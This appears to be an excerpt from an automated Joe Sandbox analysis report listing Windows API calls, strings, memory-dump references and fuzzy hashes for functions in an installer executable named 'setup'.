                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • GetProcAddress.KERNEL32(SetWindowTheme), ref: 00CAA51D
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CAA534
                                                                                                                                                                              • SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 00CAA55F
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00C889F0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                                                                                                                              • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                                                                                              • API String ID: 3410024541-3123591815
                                                                                                                                                                              • Opcode ID: 47d04753460f11c2d36c2d7adaf5691da90a4b310a7e97d88fe254e8be934690
                                                                                                                                                                              • Instruction ID: 862a1961dee5bccd45f906ecf0298b351845c1b325880f2fa72a04d255f31977
                                                                                                                                                                              • Opcode Fuzzy Hash: 47d04753460f11c2d36c2d7adaf5691da90a4b310a7e97d88fe254e8be934690
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21C172A41705EFCB20DF19ED06B59B760EB1BB30F144215E460B72D0DBB0BA08CB66
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC115A
                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00BC1167
                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00BC12A2
                                                                                                                                                                                • Part of subcall function 00BC0FB0: GetWindowRect.USER32(?,?), ref: 00BC0FDC
                                                                                                                                                                                • Part of subcall function 00BC0FB0: GetWindowRect.USER32(?,?), ref: 00BC0FEC
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC11FB
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BC120B
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BC1225
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3200805268-0
                                                                                                                                                                              • Opcode ID: aa79ab7d602628adb6b961cdf03611c1f56acafc492b706b741d48665e36026f
                                                                                                                                                                              • Instruction ID: ed585eda78f17da923c91d914f81e4e35340c132cec3cb2112f872beffd4ceec
                                                                                                                                                                              • Opcode Fuzzy Hash: aa79ab7d602628adb6b961cdf03611c1f56acafc492b706b741d48665e36026f
                                                                                                                                                                              • Instruction Fuzzy Hash: 56418B305087019FC321DF29C980E6BF7EAFFA6704F544A5DF095A6562EB30E9888B52
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowDC.USER32(?,02141699,?,00000000,?,?,?,?,?,00000000,00DAE6A5,000000FF,?,00BC9082,?,?), ref: 00BC9302
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00BC9321
                                                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00BC9330
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00BC938E
                                                                                                                                                                              • ExcludeClipRect.GDI32(?,?,?,?,00000000), ref: 00BC93B8
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00BC93D2
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00BC93E1
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00BC9404
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectWindow$DeleteRectSelect$ClipEnabledExclude
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3871716574-0
                                                                                                                                                                              • Opcode ID: 79f981c74a7cf92ae28741a2b2816dade2d7ab2f8d260fdf0f437fd3a8ba8fbe
                                                                                                                                                                              • Instruction ID: e82a3351f2ddd279d9595a98d572ac10e7f73974d9bac6a183cff2fc5fbe5051
                                                                                                                                                                              • Opcode Fuzzy Hash: 79f981c74a7cf92ae28741a2b2816dade2d7ab2f8d260fdf0f437fd3a8ba8fbe
                                                                                                                                                                              • Instruction Fuzzy Hash: E6415171A00215AFEB14DFA5DD48BAEBBF9FB88710F10426AE915F3250DB745D05CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                                • Part of subcall function 00D7F896: IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7DB
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00BB8164,?), ref: 00D7F802
                                                                                                                                                                              • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,00BB8164,?), ref: 00D7F816
                                                                                                                                                                              • InterlockedPopEntrySList.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F829
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00BB8164,?), ref: 00D7F83C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2460949444-0
                                                                                                                                                                              • Opcode ID: eed45bd37e021879e12d93f965e75723763be056be5e48f805d8945b13333367
                                                                                                                                                                              • Instruction ID: 30662b472efdefff37084521541b44ee2faeecd06c91f08c20c3b63995a23234
                                                                                                                                                                              • Opcode Fuzzy Hash: eed45bd37e021879e12d93f965e75723763be056be5e48f805d8945b13333367
                                                                                                                                                                              • Instruction Fuzzy Hash: C111EBB1700611EFE73117AAAC48F27765DFB49785F254131F909F6250EA21CC4887B2
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,02141699), ref: 00CCF5A9
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00CCF61B
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00CCF8BC
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00CCF91A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Read$CloseCreateHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1724936099-0
                                                                                                                                                                              • Opcode ID: d0a2f3e11bd6153d0c4d5e840b5f729c6b147caeaa3e78c83de78532a2a52048
                                                                                                                                                                              • Instruction ID: 9db21b93fb8422ae33b952370465a9d6d0973440f355fed07bf7628922c2c21a
                                                                                                                                                                              • Opcode Fuzzy Hash: d0a2f3e11bd6153d0c4d5e840b5f729c6b147caeaa3e78c83de78532a2a52048
                                                                                                                                                                              • Instruction Fuzzy Hash: 04D17F71D00308DBDF24CFA4C849BAEBBB6BF49304F20426DE415BB291D774AA46CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BBD5
                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,00EA6B7C,00000000), ref: 00C7BC0C
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00C7BCA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$InfoParametersSystem
                                                                                                                                                                              • String ID: AI_FRAME_NO_CAPTION_$Dialog$`Dialog` = '
                                                                                                                                                                              • API String ID: 3910108132-2270296660
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,02141699), ref: 00BBE491
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BBE4BA
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00BBE72E
                                                                                                                                                                              • CloseHandle.KERNEL32(?,02141699,?,?,00000000,00DAC9ED,000000FF,?,00E172AC,00000000,00E172AC,00000000,?,80000001,00000001,00000000), ref: 00BBE7BE
                                                                                                                                                                              Strings
                                                                                                                                                                              • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00BBE486
                                                                                                                                                                              • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00BBE4F2
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$CreateErrorEventHandleLast
                                                                                                                                                                              • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                              • API String ID: 1253123496-2079760225
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1648,02141699,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC5DA
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5), ref: 00BBC65A
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC813
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA1664,?,?,?,?,?,?,?,?,?,?,00000000,00DAC2E5,000000FF), ref: 00BBC834
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 1807155316-3261393531
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,02141699,02141699,?,?), ref: 00CC9806
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00CC9816
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00CC9868
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-3913318428
                                                                                                                                                                              APIs
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00BB10F4
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB1169
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?), ref: 00BB11D9
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00BB11DF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,02141699), ref: 00BB120C
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,02141699), ref: 00BB1212
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB122A
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$Heap$String$Process
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2680101141-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.COMBASE(00E195AC,00000000,00000001,Function_00279C34,?), ref: 00BB84D0
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                              • String ID: :${
                                                                                                                                                                              • API String ID: 542301482-3766677574
APIs
• RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00DE871D,000000FF,?,00CCBCE6,?), ref: 00CCBA73
  • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
• RemoveDirectoryW.KERNEL32(?,02141699,?,?,?,?,00DE871D,000000FF,?,00CCBCE6,?,00000000), ref: 00CCBAA2
• GetLastError.KERNEL32(?,02141699,?,?,?,?,00DE871D,000000FF,?,00CCBCE6,?,00000000), ref: 00CCBAB2
• DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,00DE871D,000000FF,?,80004005,02141699,?), ref: 00CCBB83
• GetLastError.KERNEL32(?,?,74DF3220), ref: 00CCBBC2
  • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
  • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
  • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
Similarity
• API ID: DirectoryErrorInit_thread_footerLastRemove$DeleteFileFindHeapProcessResource
• String ID: \\?\
• API String ID: 34920479-4282027825
• Opcode ID: 4ad9993a82baabb19e364664e0a9bddc074e6ad0b446e5e98b2c98bdccefe260
• Instruction ID: 2accdeee6b4dd87964ad78f93b425bf93c1062c9105fd1736b64573f65367cc0
• Opcode Fuzzy Hash: 4ad9993a82baabb19e364664e0a9bddc074e6ad0b446e5e98b2c98bdccefe260
• Instruction Fuzzy Hash: 0B51AE71A046089FDB10EFA9C856FAAB7E8EF05321F20465DE8A1D7290DB359D44DB60
APIs
• EnterCriticalSection.KERNEL32(00EA699C,02141699,00000000,00EA69B8), ref: 00BB9C43
• LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9CA8
• LoadCursorW.USER32(00BA0000,?), ref: 00BB9D04
• LeaveCriticalSection.KERNEL32(00EA699C), ref: 00BB9D9B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
Similarity
• API ID: CriticalSection$Leave$CursorEnterLoad
• String ID: v$ATL:%p
• API String ID: 2080323225-109518622
• Opcode ID: 02eef52ec52527f51f7e88a20dd125d1eb0910c81e8536910d0224578e749a41
• Instruction ID: 2dbce08e59c4c7bf63173a76080c84b94452ffe40c5c9af82addf93aec82cf0e
• Opcode Fuzzy Hash: 02eef52ec52527f51f7e88a20dd125d1eb0910c81e8536910d0224578e749a41
• Instruction Fuzzy Hash: C551BC71D00B44DFDB20CF69C9406AABBF0FF59320F04465EE995A3691E7B1B984CB90
APIs
• __Init_thread_footer.LIBCMT ref: 00BB2592
  • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
  • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
  • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
• __Init_thread_footer.LIBCMT ref: 00BB25DA
• CreateDirectoryW.KERNEL32(00E9CAB0,00000000,?,?,02141699,?), ref: 00BB2617
  • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
  • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
Similarity
• API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionCreateDirectoryVariableWake
• String ID: xi$xi$xi
• API String ID: 2312781895-3608368268
• Opcode ID: e0532a7b027b1c4f603d7a02481810db2d180992c8f066e4e1633b88001c4e8c
• Instruction ID: f795e41ddb63a13905f1eb0a06442b42f7b237a49cbeaebb1ecf92225c37101a
• Opcode Fuzzy Hash: e0532a7b027b1c4f603d7a02481810db2d180992c8f066e4e1633b88001c4e8c
• Instruction Fuzzy Hash: 48419471D00308DFCB10EBA4D945BEEB7F4EB5A710F1442A9E452BB2D1DB706A08CB61
APIs
• FreeLibrary.KERNEL32(00000000,?,00D99A60,?,000000FF,-00000010,00000000,?,?,00D99CCA,00000021,FlsSetValue,00E10E8C,00E10E94,-00000010,00000000), ref: 00D99A14
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: dd2b4a1eea946f6a51f54682a2d209ef6df5cdc4b655fba6dcec302ecca82fc1
• Instruction ID: ef2c0dd3f0ead0a7103a7dec309161b74bad36725dab0f7157c1890de3aead67
• Opcode Fuzzy Hash: dd2b4a1eea946f6a51f54682a2d209ef6df5cdc4b655fba6dcec302ecca82fc1
• Instruction Fuzzy Hash: AA21EB31A01210BFDF219B69DC91A5AB768EB927A0F28121DFD06B72D1D730ED44CAF0
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D7D0B8,00D7D01B,00D7D2BC), ref: 00D7D054
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D7D06A
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D7D07F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: 6f4bbd874afdff8181cdeb273a359128944e5f841d505f8a8243db662ca48ae5
• Instruction ID: 6ed1085fe6b0242c828318dc5091343e24a837a1256b65ba1e18263efc3f2e80
• Opcode Fuzzy Hash: 6f4bbd874afdff8181cdeb273a359128944e5f841d505f8a8243db662ca48ae5
• Instruction Fuzzy Hash: 69F0C8313443119F9B315F615C8166733AA6F45715B28E23AD90DF3690FA61CC8AD6F0
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF37A
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF39C
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF3C4
                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00BDF4A5
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00BDF507
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00BDF531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1102183713-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BDF16D
